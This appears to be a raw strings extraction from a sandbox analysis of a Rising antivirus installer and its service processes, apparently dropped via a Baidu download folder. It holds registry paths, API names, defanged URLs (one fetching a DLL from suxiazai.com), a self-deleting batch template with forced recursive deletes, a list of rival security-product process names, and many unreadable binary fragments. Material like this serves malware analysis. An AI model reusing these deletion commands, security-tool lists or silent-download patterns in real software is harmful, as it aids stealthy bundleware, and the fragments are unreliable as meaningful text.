6,,,,6,,,
555555555555555
666666666666666666
888888888
CC.CCCCCC6hML7L77L789;nOOOOOOOO8
...CCCCCC6hMLL7777789;
...CCCCCC6hML77777789;
"""!"!"!"
1111111111111000000
!%%&11&&&
23333333333333333333
3333343333333333334
443434333333333333
#34344443344333343
3444444444444
444444444444
7676676676676676
7777777777777
77777777777
>889889889889883$3
/2$ÝDD
4::-...,..,,,, %
7766666666666666666666601$ÞDE
000000000000011110
"#%DPTVVVVVVPO%%"L
version="1.0.0.0"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
<requestedExecutionLevel
6'6.6>6>7
2<3t3
9#939:9[9
; ;$;(;,;0;4;8;<;
/hXXp://csc3-2010-crl.verisign.com/CSC3-2010.crl0D
hXXp://ocsp.verisign.com0;
/hXXp://csc3-2010-aia.verisign.com/CSC3-2010.cer0
)rackUrl3&
4{Z'rS%sT%sT%sT%sT$rR#sR"mNversion="1.0.0.0"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
<!--The ID below indicates application support for Windows Vista -->
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/><!--The ID below indicates application support for Windows 7 -->
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><!--The ID below indicates application support for Windows 8 -->
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>It is strongly recommended to close all Windows program before running the setup program.
Password:
This module need %fM
1.0.0.2
Setup.EXE
20140619153336140
ECan't create the destination folder, please check and input it again.APlease take off your CD avoiding to restart from CDROM next time.
Totally scaned %d files, found %d viruses.
Export,Unable to Create File Folder: %s , continue?
This version [version:%s] is older than your current installed [version:%s]
Continue to install Rising AntiVirus Software[version:%s]?
%Click "Next" to continue installation
jSystem comctl32.dll version is lower than 4.70!\please upgrade it through installing IE4 or above version.
KYou have install follow Rising product, this product can't install whit it.FLast Rising setup progress is not completed, please reboot your systemNRising Anti-virus software has been uninstalled successfully but follow files.
!Version: %s Update Date: %s
$Add or remove same component please!(%d second left to auto close this dialog8Rising Anti-virus software has been updated successfully
Password is error7update is completed, windows need reboot for copy file.
install1393485.exe_1148_rwx_00401000_001FC000:
\rsdebug.ini
c:\%s
dbghelp.dll
kernel32.dll
d-d-d(d-d-d)
Kernel32.dll
\rsmain.exe
[d-d-d][d:d:d:d]
%s\%s
%s\*.*
C:\Temp
SOFTWARE\Rising\%s
2.log
[u]
[0xX]
RAV.INI
\Rs7zSfx.log
\setup.dll
CLSID\{CAA2D3B1-4BB5-4a45-A17A-122773379D99}%s\CompsVer.inf
Setup.exe
%s\auto.ini
@Sleep...%d
%s Start
%s End
{E5C53971-D80E-4500-BE0D-761BF3CD8457}Unsupported Method
Password is not defined
mscoree.dll
- This application cannot run using the active version of the Microsoft .NET Runtime
Please contact the application's support team for more information.
GetProcessWindowStation
user32.dll
internal state. The program cannot safely continue execution and must
continue execution and must now be terminated.
CLSID\{CAA2D3B2-4BB5-4a45-A17A-122773379D99}XXXXXXXXXXX
{X-X-X-XX-XXXXXX}\NetConfig.ini
{"vkey": "%s", "guid": "%s", "sguid": "%s", "actionid": "%s", "tag": "%s","step": "%s","result": "%s", "errorcode": "%s", "remark": "%s", "pa": "%s", "pb": "%s"}
Label.dat
hXXp://center.rising.com.cn/urg.asp?v=%s&t=%s&a=%s
%sbase
Iphlpapi.dll
\\.\PhysicalDrive%d
\\.\Scsi%d:
MSIE %d.%d
WININET.DLL
Windows
Windows Me
Windows 98
Windows 95
Windows NT %d.%d
%s:%d
Mozilla/4.0 (compatible; %s; %s; Rising)
Content-Type: application/x-www-form-urlencoded
HTTP/1.0
C:\DistributedAutoLink\Temp\CompileOutputDir\7zSfx.pdb
COMCTL32.dll
GDI32.dll
restorelog.txt
zcÁ
T3%dU
K.ZuNN
)$OI%f
B.Yo@
26.Ip
up.yF
~mM.Bv
qPndR.Ts
Thawte Certification1
hXXp://ocsp.thawte.com0
.hXXp://crl.thawte.com/ThawteTimestampingCA.crl0
hXXp://ts-ocsp.ws.symantec.com07
hXXp://ts-aia.ws.symantec.com/tss-ca-g2.cer0<
hXXp://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
.Class 3 Public Primary Certification Authority0
<VeriSign Class 3 Public Primary Certification Authority - G50
hXXp://crl.verisign.com/pca3.crl0
hXXps://VVV.verisign.com/cps0
#hXXp://logo.verisign.com/vslogo.gif04
hXXp://ocsp.verisign.com0>
2Terms of use at hXXps://VVV.verisign.com/rpa (c)101.0,
hXXp://sf.symcb.com/sf.crl0f
hXXps://d.symcb.com/cps0%
hXXps://d.symcb.com/rpa0
hXXp://sf.symcd.com0&
hXXp://sf.symcb.com/sf.crt0
hXXps://VVV.verisign.com/cps0*
hXXps://VVV.verisign.com/rpa0
#hXXp://crl.verisign.com/pca3-g5.crl04
hXXp://ocsp.verisign.com0
DhXXp://crl.microsoft.com/pki/crl/products/MicrosoftCodeVerifRoot.crl0
z.oao
].XcG
~jq.wz
.FDF`O
;.bd/
:U%SN
ej.CC
`X.UT?.
.lqwD
*e_!.sWI$`
]>!.gB
k.Rrt
TCP_yy
%S5]*
.fb#c$Z4
h[%D}_
$T.Ia
V.jurV
Sù,
T%xYS3
9kl.Uw
We]%F
u.zQ0
4\ R%d
.qJ4C9.
[email protected]
y.Di
vJY.lNk'1
.Gi#O$@$
~D.Hh
U.LZe
yo.NRL;
.npr =
y/"Z.Jn(
Diurl
A.Ot=_d
.psd x
}.eNk^6E
@%X;g
~gq%c^
;.Aum
_6}"%_^&
36.hU
S}i;%u
$.dls
iY.Ub
%cUNX<
EHJJGA[.Oj
S.lW"
.hw1.
.CB5t
.MAF!
|%X3j
.aRSr
".xNT
3.Mh)
X2.Wq
B%.GMK
8&H8.VW
a%s%s
.dk:8e`
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\RsdSfxTmp
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\install1393485.exe
.text
`.rdata
@.data
.rsrc
@.reloc
QSVSSSh
>%uPV
|$D.tD
.tgPV
FTPjK
FtPj;
C.PjRVj
u.VV3
|$$vL9|$ u%Sh
Advapi32.dll
Explorer.exe
NtDll.dll
%d %d %d %d
Failed to call WTSQueryUserToken, err= 0x%x
wtsapi32.DLL
Could not open pipe
SetNamedPipeHandleState failed
\\.\pipe\RISING_RSD_BU
%*.*f
/RUNAS %s
Failed to load psapi.dll.
Psapi.dll
Setup.exe End with ErrorCode: 0xX
hXXp://center.rising.com.cn/LogCenter.asp?info=%s
Key=%s&v1=%s&v2=%s&v3=%s&v4=%s&v5=%s
Password
Port
%s\Data\%s\%s.ini
setup.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
%s(%s)
ReportView
KERNEL32.DLL
SetWillReboot(%d)
Failed to call QueryServiceStatus(RSD)! Err Code: %d
Failed to call OpenService(RSD)! Err Code: %d
Failed to call OpenSCManager! Err Code: %d
\RsTest.ini
%DESKTOP%
\label.dat
\Backup.ini
\Export.ini
\XMLS\RSSetup.xml
\Setup.exe
\*.exe
\XMLS\Setup.xml
\os.xml
/PASS=
/PRODUCT=%s
/LANG=%d
HKEY_LOCAL_MACHINE\SoftWare\Rising\%s
ITEM%d
UPDATEXMLURL
d-d-- d:d
Setup.dll
Local_RSD_Setup_%s
Global\Rising_RSD_Setup_%s
Rising_RSD_Setup_%s
\Backup\RSD\RSSetup\RSSetup.xml
\RSSetup.xml
\CompsVer.inf
AddPCAExclude return: %d
Open Key Failed!
Create Key Failed!
Query Value Failed! Return: %d
%s\Setup.exe
SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags
AddPCAExclude(%d)
Setup.xml
\Setup.xml
12345678.000
Create Temp Cfg From %s to %s
rd /q %s
rd /s /q %s
if exist %s goto repeat
del /s /q /f %s
\DelSelf.bat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
SetFileSecurity() failed. Error %d
SetSecurityDescriptorControl() failed.Error %d
GetSecurityDescriptorControl() failed.Error %d
SetSecurityDescriptorDacl() failed. Error %d
AddAce() failed. Error %d
GetAce() failed. Error %d
AddAccessAllowedAce() failed. Error %d
AddAccessAllowedAceEx() failed. Error %d
advapi32.dll
InitializeAcl() failed. Error %d
HeapAlloc() failed. Error %d
GetAclInformation() failed. Error %d
GetSecurityDescriptorDacl() failed. Error %d
InitializeSecurityDescriptor() failed.Error %d
GetFileSecurity() failed. Error %d
InitializeSid() failed. Error %d
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
<!--%s-->
WinSessionThread GetPidByName dwPID = %d , name=%s!
WTSQueryUserToken Failed! Err Code: %d
OpenProcess Failed! Err Code: %d
GetProcAddress(OpenProcessToken) Failed! Err Code: %d
OpenProcessToken Failed! Err Code: %d
GetLogonUserToken(%d)
CreateProcess2 Return: %d
LoadLibrary Failed! Err Code: %d
CreateEnvironmentBlock Failed! Err Code: %d
DuplicateTokenEx Failed! Err Code: %d
CreateProcessWithTokenW Failed! Err Code: %d
Userenv.DLL
GetFileAttributes %s return: %d
Delete File %s fail, Err: %d
Wow64DisableWow64FsRedirection Return: %d
Wow64RevertWow64FsRedirection Return: %d
RsInstallService(%s) Return: %d
ChangeServiceConfig Failed! Err Code: %d
CreateService Failed! Err Code: %d
OpenSCManager Failed! Err Code: %d
RsInstallService(%s)
RsUninstallService(%s) Return: %d
DeleteService Failed! Err Code: %d
OpenService Failed And Service Already Exist! Err Code: %d
RsUninstallService(%s)
OpenService Failed! Err Code: %d
LoadLibrary(Advapi32.dll) Failed!
RsSetServiceFailureAction(%s) Return: %d
GetProcAddress(%s) Failed!
ChangeServiceConfig2 Failed! Err Code: %d
RsSetServiceFailureAction(%s)
QueryServiceStatus Failed! Err Code: %d
StartService Failed! Err Code: %d
RsStartService(%s)
Wait for Service %s Time Out!
QueryServiceStatus(%s) Failed! Err Code: %d
ControlService(%s) SERVICE_CONTROL_STOP Failed! Err Code: %d
HeapAlloc Failed! Err Code: %d
EnumDependentServices Failed! Err Code: %d
Stop Service %s Dependencies...
%s's Stop is Pending...
Service %s is Stopped...
OpenService(%s) Failed! Err Code: %d
RsStopService(%s)
Rs%sInstallCom(%s) Return: %d
LoadLibrary(%s) Failed!
%s Failed! ErrMsg: %s
Rs%sInstallCom(%s)...
WinSessionThread CreateProcess ret = %d end !
WinSessionThread CreateProcess pid = %d, CreateProcessAsUser err = %d !
WinSessionThread CreateProcess begin dwSessionID = %d!
WININIT.INI
\WININIT.INI
HKEY_CURRENT_CONFIG
"%s" %s
\RsMgrSvc.ini
Save DELETEPATH %s to RsMgrSvc.ini
Save REBOOTRUN %s to RsMgrSvc.ini
%s Loaded By %s
EXPLORER.EXE
Setup.exe Begin----------------------------------
HKEY_DYN_DATA
HKEY_PERFORMANCE_DATA
StopComponent(%s)...
StartComponent(%s)...
Report Error!
Call Component %s Dll_PreHandle Return: 0xX
Call Component %s Dll_PostHandle Return: 0xX
Check XML File %s Failed
Check File %s Failed
BackUp XML File From: %s To %s
Delete XML File: %s
Copy XML File From: %s To %s
%s\RsMgrsvc.ini
URLInfoAbout
hXXp://help.ikaka.com/
"%s" /UNINSTALL /PRODUCT=%s
"%s" /UNINSTALL /PRODUCT=RSD
Delete File %s
Copy File From %s To %s
CompsVer.inf
Copy Path From %s To %s
Down Load %s To Path: %s
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\windows\currentversion\run
RunFirstInstall Successfully...NeedReboot: %d
InstallComponentList Failed! Error Code: 0xX
PreHandleComponentList Failed! Error Code: 0xX
Product_PreHandle Failed! Error Code: 0xX
BackUpComponentList Failed! Error Code: 0xX
CheckComponentList Failed! Error Code: 0xX
RunFirstInstall, AfterReboot: %d
RavTmp: %s
file not exist : %s
succeed to download %s
Failed to download %s. ErrCode = %d; hr = %d
Failed to verify %s
%s%s/%s%s.inf
Failed to get download url from %s
URLLIST
Failed to load %s.
%s%s/%s/%s/%s
%s\%s\%s\%s
%s%s/%s/%s
%s\%s\%s
Failed to get %s-ITEM.
Failed to get %s-FILES.
Failed to get %s-COMPONENT.
Download %s retry > 3
%s/%s/%s_xml.zip
%s\%s\%s.xml
%s%s/%s/%s.xml
Failed to get %s' newver from %s
SCMD
REGVERKEY
REGKEYVALUE
REGKEYNAME
REGKEY
Set File %s Everyone Access Rights 0xX return: %d
Set File %s Users Access Rights 0xX return: %d
Delete File Return: %d, NeedReboot: %d
Prepare To Delete File %s...
Back Up File From: %s To: %s Return: %d
Skip Backing Up File %s For Checked OK...
Copy File Return: %d, NeedReboot: %d
MoveFile From %s To %s
Prepare To Copy File From %s To %s...
TaskbarPin = 0x%x
Install Link: %s
Delete Link: %s
TaskbarunPin = 0x%x
Old Link File: %s
SUBKEY
Set Key %s Everyone Access Rights 0xX return: %d
Set Key %s Users Access Rights 0xX return: %d
REGKEYDATATYPE
Install Key KeyName: %s, ValueName: %s, Value: %s, DataType: %d Return: %d
Backup Key Value Return: %d
microsoft\windows\currentversion\run
Restore Key Value Return: %d
UnInstall Key KeyName: %s, ValueName: %s Return: %d
Execute langsel.exe
langsel.exe
Setup Log (*.log)
*.log
A%d M
ÚTADIR%
Need Reboot, Add DeletePath Task To Server: %s
No Reboot, RsDeletePath(%s)
\lics%d.txt
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
{X-X-X-XX-XXXXXX}.bmpSOFTWARE\Microsoft\Windows NT\CurrentVersion
SHFolder.dll
Shell32.dll
HKEY_LOCAL_MACHINE\%s\%s
%snserver.exe
%sRsTest.ini
Software\Microsoft\Windows\CurrentVersion
nserver.exe
%FIRSTPART%
%COMMONDIR%
%DOMINODATA%
%DOMINODIR%
%SYSDIR64%
%SYSDIR%
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
[INF]CRsConfigBase::InitializeRsConfig: GetPath(PathSize=%d),Result=0xX
[ERR]CRsConfigBase::InitializeRsConfig: QueryInterface RSIID_IRSCfgMgr Failed(Result=0xX)!
[ERR]CRsConfigBase::InitializeRsConfig:CreateAppEnv Failed(Result=0xX).
RsConfig.cfg
[ERR]CRsConfigBase::InitializeRsConfig:QueryInterface RSIID_IRSAppMgr failed(Result=0xX).
[ERR]CRsConfigBase::InitializeRsConfig:CreateObject RSID_RSAppMgr failed(Result=0xX).
RSAPPMGR.DLL
\RSAPPMGR.DLL
comx3.dll
</%s>
standalone="%s"
encoding="%s"
version="%s"
X;
%s='%s'
%s="%s"
\RsLang.dll
SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
System\CurrentControlSet\Services\VxD\MSTCP
255.255.255.255
socket() failed; %d
Range: bytes=%d-
hXXp://
portuguese-brazilian
.rstmp
1.1.3
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
C:\DistributedAutoLink\Temp\CompileOutputDir\Setup.pdb
GetProcessHeap
SetNamedPipeHandleState
WaitNamedPipeA
GetWindowsDirectoryA
KERNEL32.dll
MsgWaitForMultipleObjects
ExitWindowsEx
EnumWindows
EnumChildWindows
USER32.dll
comdlg32.dll
RegCloseKey
RegOpenKeyExA
RegCreateKeyA
RegOpenKeyA
RegCreateKeyExA
RegDeleteKeyA
RegSetKeySecurity
RegGetKeySecurity
RegQueryInfoKeyA
RegEnumKeyExA
ADVAPI32.dll
ShellExecuteExA
ShellExecuteA
SHELL32.dll
ole32.dll
OLEAUT32.dll
SHLWAPI.dll
RPCRT4.dll
InternetCrackUrlA
HttpQueryInfoA
HttpSendRequestA
HttpAddRequestHeadersA
HttpOpenRequestA
WININET.dll
VERSION.dll
WSOCK32.dll
GetCPInfo
version="1.0.0.0"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
<requestedExecutionLevel
/hXXp://csc3-2010-crl.verisign.com/CSC3-2010.crl0D
hXXp://ocsp.verisign.com0;
/hXXp://csc3-2010-aia.verisign.com/CSC3-2010.cer0
It is strongly recommended to close all Windows program before running the setup program.
Password:
This module need %fM
1.0.0.2
Setup.EXE
20140619153336140
ECan't create the destination folder, please check and input it again.APlease take off your CD avoiding to restart from CDROM next time.
Totally scaned %d files, found %d viruses.
Export,Unable to Create File Folder: %s , continue?
This version [version:%s] is older than your current installed [version:%s]
Continue to install Rising AntiVirus Software[version:%s]?
%Click "Next" to continue installation
jSystem comctl32.dll version is lower than 4.70!\please upgrade it through installing IE4 or above version.
KYou have install follow Rising product, this product can't install whit it.FLast Rising setup progress is not completed, please reboot your systemNRising Anti-virus software has been uninstalled successfully but follow files.
!Version: %s Update Date: %s
$Add or remove same component please!(%d second left to auto close this dialog8Rising Anti-virus software has been updated successfully
Password is error7update is completed, windows need reboot for copy file.
RsMgrSvc.exe_1936:
.text
`.rdata
@.data
.rsrc
CryptDecodeObject failed with %x
wintrust.dll
WTHelperGetProvCertFromChain
CryptCATCatalogInfoFromContext
crypt32.dll
CryptMsgGetParam
CryptSIPVerifyIndirectData failed with %x
1.3.6.1.4.1.311.2.1.4
CryptMsgGetParam(%d) failed with %x
CryptSIPRetrieveSubjectGuid failed with %x
CryptQueryObject failed with %x
\\.\PhysicalDrive%d
\\.\Scsi%d:
Iphlpapi.dll
Software\Microsoft\Windows\CurrentVersion
Advapi32.dll
\Rising\RSD\RsMgrSvc.exe"
Explorer.exe
XXXXXXXXXXX
{X-X-X-XX-XXXXXX}CLSID\{CAA2D3B1-4BB5-4a45-A17A-122773379D99}Software\Microsoft\Windows NT\CurrentVersion\Winlogon
[d-d-d][d:d:d:d]
SHFolder.dll
Shell32.dll
SOFTWARE\Rising\%s
2.log
[u]
[0xX]
RAV.INI
WinSessionThread GetPidByName dwPID = %d , name=%s!
NtDll.dll
Kernel32.dll
WTSQueryUserToken Failed! Err Code: %d
wtsapi32.DLL
OpenProcess Failed! Err Code: %d
GetProcAddress(OpenProcessToken) Failed! Err Code: %d
OpenProcessToken Failed! Err Code: %d
GetLogonUserToken(%d)
>`userinit.exe
CRsMgrSvc::WaitForLogonNT:LoadLibrary(_"psapi.dll");err=0x%x
psapi.dll
Fail to OpenProcessToken; 0x%x
Failed to call CreateProcessAsUser again: appname = %s cmd=%s;err=0x%x.
Failed to SetTokenInformation(0):err=0x%x
Failed to call CreateProcessAsUser:cmd=%s;err=0x%x.
Failed to DuplicateTokenEx:err=0x%x
Failed to SetTokenInformation:err=0x%x
SessionId = %d
Failed to LoadLibrary("Wtsapi32.dll"):err=0xFailed to call WTSEnumerateSessions:err=0x%x
SessionInfo[%d]: SessionId=%d; WinStationName=%s; State=%d.
Wtsapi32.dll
Failed to CreateProcess:%s;err=0x%x
Failed to LoadLibrary("Wtsapi32.dll"):err=0x%xFailed to WTSEnumerateSessions:err=0x%x
Session\%d\RSD_POP_MESSAGE_INFO
WinSessionThread CreateProcess ret = %d end !
WinSessionThread CreateProcess pid = %d, CreateProcessAsUser err = %d !
Userenv.DLL
WinSessionThread CreateProcess begin dwSessionID = %d!
Failed to LoadLibrary("Userenv.DLL"):err=0x%xFailed to call CreateProcessAsUser: cmd=%s;err=0x%x.
New Failed to call WTSQueryUserToken, err= 0x%x
rsmsg
%s\rsmsginfo.ini
Failed to open the shell ready event: 0x%x
"%s" /shellrun
%s\RsStub.exe
Session\%d\ShellReadyEvent
LogonRun - session : %d
Failed to call RegOpenKeyEx, err = 0x%x
Failed to call RegSaveKey, err = 0x%x
Failed to call AdjustTokenPrivileges, err = 0x%x
Failed to call OpenPrcessToken, err = 0x%x
%s\RsMgrSvc.dat
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\%s
BaiduAnSvc.exe
BaiduSdSvc.exe
liebao.exe
ksafe.exe
{849B7E2B-0551-429C-B317-14B7D374D6EC}_is1kxescore.exe
QQPCRtp.exe
360sd.exe
360se.exe
{23F3F476-BE34-4f48-9C77-2806A8393EC4}360Desktop.exe
ZhuDongFangYu.exe
safeboxTray.exe
Failed to Create LogonRunThread Thread, err = 0x%x
SessionChange:EventType=%d; sessionID = %d
\Backup\RSD\RSSetup\RSSetup.xml
rsup10.rising.com.cn
u.suxiazai.com
%s?t=0&info=%s
ver=%s&guid=%s&sguid=%s&state=%s
hXXp://u.suxiazai.com/menu/info.xml
hXXp://rsup10.rising.com.cn/menu/info.xml
%srsd\info.xml
/subkey
Failed to Verify the "%s".
Failed to call vf.Init.
%s\rsbackup.exe
"%s\rsbackup.exe"
/subkey
%s\RsMgrSvc.ini
%s\updater.exe
"%s\updater.exe"
DeleteFile: %s.
ITEM%d
\RsMgrSvc.ini
DeletePath: %s.
Clean WillReboot In %s
%s\%s\%s.ini
1971-01-01 00:00:00
%d-%d-%d %d:%d:%d
%s\Data
%s /subkey %s /RsMgrSvc
"%s\Updater.exe" /silence
%s\Updater.exe
\Reboot.ini
CRsMgrSvc::SVC:Failed to CreateEvent-Wait: err=0x%x
CRsMgrSvc::SVC:Failed to CreateEvent, err=0x%x
comx3.dll
KERNEL32.DLL
kernel32.dll
MSIE %d.%d
WININET.DLL
Windows
Windows Me
Windows 98
Windows 95
Windows NT %d.%d
%s:%d
Mozilla/4.0 (compatible; %s; %s; Rising)
HTTP/1.0
Range: bytes=%d-
RstoreDll.dll
@CRsUseRepairProduct::prstorestart %s Dllpath:%s
@CRsUseRepairProduct::prstorestart %s
Subkey: %s could not find dllPath ,so use rsd path:%s
Subkey: %s Path:%s
\RstoreDll.dll
02%d.d.d.d
CRsLoadCloud::DownLoadCldRsdDll... faild hre = %d ,lasterror = %d
CRsLoadCloud::LoadCldRsdDll... failed lasterror = %d
CRsLoadCloud::LoadCldRsdDll...%s
CRsLoadCloud::StartTask...success
CRsLoadCloud::InitData... CopyFile flag= %d.
hXXp://download.suxiazai.com/for_down/2013/new/dlls/CldRsd.dll
CldRsd.dll
mscoree.dll
internal state. The program cannot safely continue execution and must
continue execution and must now be terminated.
- This application cannot run using the active version of the Microsoft .NET Runtime
Please contact the application's support team for more information.
GetProcessWindowStation
user32.dll
C:\DistributedAutoLink\Temp\CompileOutputDir\RsMgrSvc.pdb
GetWindowsDirectoryA
KERNEL32.dll
USER32.dll
RegCloseKey
RegOpenKeyExA
RegEnumKeyExA
RegCreateKeyA
RegOpenKeyA
RegSaveKeyA
RegQueryInfoKeyA
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
SHLWAPI.dll
CryptMsgClose
CertCloseStore
CertGetNameStringW
CertFindCertificateInStore
CRYPT32.dll
RPCRT4.dll
InternetCrackUrlA
HttpQueryInfoA
HttpSendRequestA
HttpOpenRequestA
HttpAddRequestHeadersA
WININET.dll
VERSION.dll
GetProcessHeap
GetCPInfo
%Program Files%\Rising\RSD\RsMgrSvc.exe.log
%Program Files%\Rising\RSD\RsMgrSvc.exe
.Beijing Rising Information Technology Corporation Limited
1.0.0.50
RsMgrSvc.exe
20150423153938597
install1393485.exe_1148_rwx_10072000_00001000:
SetWillReboot(%d)
Failed to call QueryServiceStatus(RSD)! Err Code: %d
Failed to call OpenService(RSD)! Err Code: %d
Failed to call OpenSCManager! Err Code: %d
\RsTest.ini
ÞSKTOP%
\label.dat
\Backup.ini
\Export.ini
\XMLS\RSSetup.xml
\Setup.exe
\*.exe
\XMLS\Setup.xml
\os.xml
Label.dat
/PASS=
/PRODUCT=%s
/LANG=%d
HKEY_LOCAL_MACHINE\SoftWare\Rising\%s
ITEM%d
UPDATEXMLURL
d-d-- d:d
Setup.dll
Local_RSD_Setup_%s
Global\Rising_RSD_Setup_%s
Rising_RSD_Setup_%s
\Backup\RSD\RSSetup\RSSetup.xml
\RSSetup.xml
\CompsVer.inf
AddPCAExclude return: %d
Open Key Failed!
Create Key Failed!
Query Value Failed! Return: %d
%s\Setup.exe
SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags
AddPCAExclude(%d)
Setup.xml
\Setup.xml
12345678.000
Create Temp Cfg From %s to %s
rd /q %s
rd /s /q %s
if exist %s goto repeat
del /s /q /f %s
\DelSelf.bat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
SetFileSecurity() failed. Error %d
SetSecurityDescriptorControl() failed.Error %d
GetSecurityDescriptorControl() failed.Error %d
SetSecurityDescriptorDacl() failed. Error %d
AddAce() failed. Error %d
GetAce() failed. Error %d
AddAccessAllowedAce() failed. Error %d
AddAccessAllowedAceEx() failed. Error %d
advapi32.dll
InitializeAcl() failed. Error %d
HeapAlloc() failed. Error %d
GetAclInformation() failed. Error %d
popwndexe.exe_760:
.text
`.rdata
@.data
.rsrc
@.reloc
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
operator
GetProcessWindowStation
USER32.DLL
C:\DistributedAutoLink\Temp\CompileOutputDir\popwndexe.pdb
KERNEL32.dll
ole32.dll
GetProcessHeap
GetCPInfo
GetConsoleOutputCP
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
mscoree.dll
KERNEL32.DLL
rsdk.dll
<plugin clsid='{56CF1F5A-D59E-4fe7-BE35-066F4E788E2A}' name='CLID_CRsPopWndUI' start='1'/><plugin clsid='{EBC23555-424F-45c3-BECE-206819CB276B}' name='ClSID_CTrayWnd' start='999' /> </plugins></process></rscom>BUF:<?xml version='1.0' ?><rscom> <components> <component path='rsdk.dll'> <clsid progid='RscomEnv.1'>{E59BC62D-64AB-439D-BAF3-B2D1BA15E441}</clsid> <clsid progid='ObjectLoader.1'>{4F496E7F-D8FD-4DED-967D-C4F53BFB9452}</clsid> <clsid progid='Rot.1'>{216DFF2F-B2F0-4CE0-BA5B-72E0B7BFAC28}</clsid> <clsid progid='MainRun.1'>{C8CA7580-8E65-49E6-A66A-B087C7EF523D}</clsid> <clsid progid='RsSrv.1'>{5D37C04C-8F58-4D47-94C8-B94153399473}</clsid> <clsid progid='Property.1'>{ED20E0E5-2357-4825-B3FA-198AEC674E81}</clsid> <clsid progid='PropertyThread.1'>{AD4F3A47-0CD6-43DE-BC22-E8BE24FFD424}</clsid> <clsid progid='Property2.1'>{2100E98D-B13E-4306-8081-50F325B10586}</clsid> <clsid progid='Property2Thread.1'>{0AEF80FB-9BAF-4E66-96B3-784ED0FCECF1}</clsid> <clsid>{E8D494C-D598-4E2F-B796-809E74315E76}</clsid> <clsid>{95EAB9C4-A7F4-46A8-A69F-54911364F2F0}</clsid> <clsid progid='TrayWnd'>{EBC23555-424F-45C3-BECE-206819CB276B}</clsid> <clsid progid='TraySrv'>{4FCE6281-8849-4FC6-A764-95C793EB8A48}</clsid> <clsid progid='TrayMenuBase'>{FCA0E62A-5DD4-46FB-AFB2-BDC74EA7DB36}</clsid> <clsid>{35FD921E-B758-46D8-B0AA-FCD033B0E66D}</clsid> <clsid progid='DfwWindow'>{201409F6-22F8-48D3-A69F-7935BDDE6BFA}</clsid> <clsid progid='DfwComponentMgr'>{787683B8-D58D-4072-BA04-46284CEA5AF8}</clsid> <clsid progid='DfwDrawIcon'>{224E5B34-E98F-4033-8B6F-46B758E7587E}</clsid> <clsid progid='DfwLocalExternal'>{23BD3E3A-72ED-4AE4-A5A9-41B466BA8D25}</clsid> <clsid progid='SafeSecurity'>{B769D42A-2392-42B6-8C10-DB99AE23F75A}</clsid> </component> <component path = 'localopt.dll'> <clsid progid='localopt'>{1DDF6C09-67B3-4b05-B3A4-43D7D92D067C}</clsid> </component> <component path = 'rsmginfo.dll'> <clsid progid='rsmginfo'>{56CF1F5A-D59E-4fe7-BE35-066F4E788E2A}</clsid> </component> 
</components></rscom>{{887FE1BB-7C1F-4d73-BD44-B726E1672DC7}}_%s%Program Files%\Rising\RSD\popwndexe.exe
1.0.0.7
tray.exe
814210592210000
9158.exe_3012:
.text
`.rdata
@.data
.rsrc
unzip 0.18 Copyright 1998-2002 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
1.1.4
inflate 1.1.4 Copyright 1995-2002 Mark Adler
HttpQueryInfoA
InternetOpenUrlA
WININET.dll
?IsControlHaveSkin@CAppSysOperation@@UAEHXZ
?CleanBitmapMem@CAppSysOperation@@UAEHXZ
?LoadBitmapFileToMem@CAppSysOperation@@UAEHPAUHINSTANCE__@@VCString@@PAVCBitmap@@@Z
?LoadBitmapFileToMem@CAppSysOperation@@UAEHPAUHINSTANCE__@@VCString@@@Z
?InitializeOperation@CAppSysOperation@@UAEXPAVCWnd@@@Z
?CleanSkin@CAppSysOperation@@UAEHPAX@Z
?DrawContent@CAppSysOperation@@UAEHPAVCDC@@VCString@@AAVCRect@@H@Z
?AdjustPosition@CAppSysOperation@@UAEHHHHH@Z
?AdjustPosition@CAppSysOperation@@UAEHUtagRECT@@@Z
?DrawSkin@CAppSysOperation@@UAEHPAUtagDRAWITEMSTRUCT@@@Z
?PaintBackGround@CAppSysOperation@@UAEHPAVCDC@@@Z
?CleanUp@CAppSysOperation@@UAEXXZ
?AttachBitmapHadle@CAppSysOperation@@UAEXPAUHBITMAP__@@PAVCBitmap@@@Z
?AttachBitmapHadle@CAppSysOperation@@UAEXPAUHBITMAP__@@@Z
?PreTranslateMessage@CUIButtonTemplate@@MAEHPAUtagMSG@@@Z
?messageMap@CUIButtonTemplate@@1UAFX_MSGMAP@@B
?GetCurrentSkin@CAppSysOperation@@UAEHPAX@Z
?LoadSkin@CAppSysOperation@@UAEHPAX@Z
?FitBitmapSize@CAppSysOperation@@UAEXXZ
?messageMap@CUIDlgTemplate@@1UAFX_MSGMAP@@B
?GetBitmapHeight@CAppSysOperation@@QAEHXZ
